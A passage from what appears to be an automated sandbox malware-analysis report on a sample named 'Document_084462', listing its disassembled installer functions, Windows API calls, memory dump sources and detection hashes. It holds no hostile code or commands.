                                                                              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                              • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                                                              Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 0040278B
                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004027AE
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027C4
                                                                                • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 00402870
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                              • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                                                              • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                              • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                                                              Function 00404CFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                                                              • GetMessagePos.USER32 ref: 00404D22
                                                                              • ScreenToClient.USER32(?,?), ref: 00404D3C
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                              • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                              • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                                                              Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402F49
                                                                              • MulDiv.KERNEL32(0006F352,00000064,0006F556), ref: 00402F74
                                                                              • wsprintfW.USER32 ref: 00402F84
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402F7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                                                              • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                                                              • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                                                              • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                                                              Function 700B25B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 700B121B: GlobalAlloc.KERNELBASE(00000040,?,700B123B,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B1225
                                                                              • GlobalFree.KERNEL32(?), ref: 700B26A3
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B26D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 1780285237-0
                                                                              • Opcode ID: ba4fee2231d47a4195e4bef62fb2b5dc8d4ddfa0cb938bb5ce29b8027cc0b038
                                                                              • Instruction ID: 3ba527704f655ed381fc54aedf2f8c614e3691766d4e092476334badc084e72f
                                                                              • Opcode Fuzzy Hash: ba4fee2231d47a4195e4bef62fb2b5dc8d4ddfa0cb938bb5ce29b8027cc0b038
                                                                              • Instruction Fuzzy Hash: 9731CF32114181EFE726AF75CC94EAE77BAEB85B31724462DF24187260C738AD14DB61
                                                                              Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                              • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 737b8f8522516fb9cb569b363d46e537343e0b0d97911977c4cfac53617ae32f
                                                                              • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                                                              • Opcode Fuzzy Hash: 737b8f8522516fb9cb569b363d46e537343e0b0d97911977c4cfac53617ae32f
                                                                              • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                                                              Function 700B23E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B2522
                                                                                • Part of subcall function 700B122C: lstrcpynW.KERNEL32(00000000,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B123C
                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 700B24A8
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 700B24C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 4216380887-0
                                                                              • Opcode ID: ec094b8c0bcd1a643fa9f27831fff5dbe774eb8d2c835ed5f8e0a29962e4b985
                                                                              • Instruction ID: f9c0aede8b082833350e1bf7fb2c18a468cd8c1812fce6c071948ae1274cca6b
                                                                              • Opcode Fuzzy Hash: ec094b8c0bcd1a643fa9f27831fff5dbe774eb8d2c835ed5f8e0a29962e4b985
                                                                              • Instruction Fuzzy Hash: AE41ACB1008385EFD325AF71CC44AAE77F9EB48B30B20492DE54686692DB78A9448B61
                                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                                                              • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                                                              • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                                                              • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 3808545654-0
                                                                              • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                              • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                                                              • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                              • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                                                              Function 700B161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,700B2238,?,00000808), ref: 700B1635
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,700B2238,?,00000808), ref: 700B163C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,700B2238,?,00000808), ref: 700B1650
                                                                              • GetProcAddress.KERNEL32(700B2238,00000000), ref: 700B1657
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1660
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                              • String ID:
                                                                              • API String ID: 1148316912-0
                                                                              • Opcode ID: 59bac89256e00a1281f6c25986cee5f4fe020e10da6adf069332286c60a813ac
                                                                              • Instruction ID: 6f8d356a0452a60aa375db1344746a32f4d88e64ae3c0bbceb813c0ad9d02d06
                                                                              • Opcode Fuzzy Hash: 59bac89256e00a1281f6c25986cee5f4fe020e10da6adf069332286c60a813ac
                                                                              • Instruction Fuzzy Hash: 3DF0987321A1387FA62126A78C4CDDBBE9CDF8B2F5B210315F728A21A086B15D0197F1
                                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                              • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                                                              • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                              • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                              Function 00404BF1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                              • wsprintfW.USER32 ref: 00404C9B
                                                                              • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
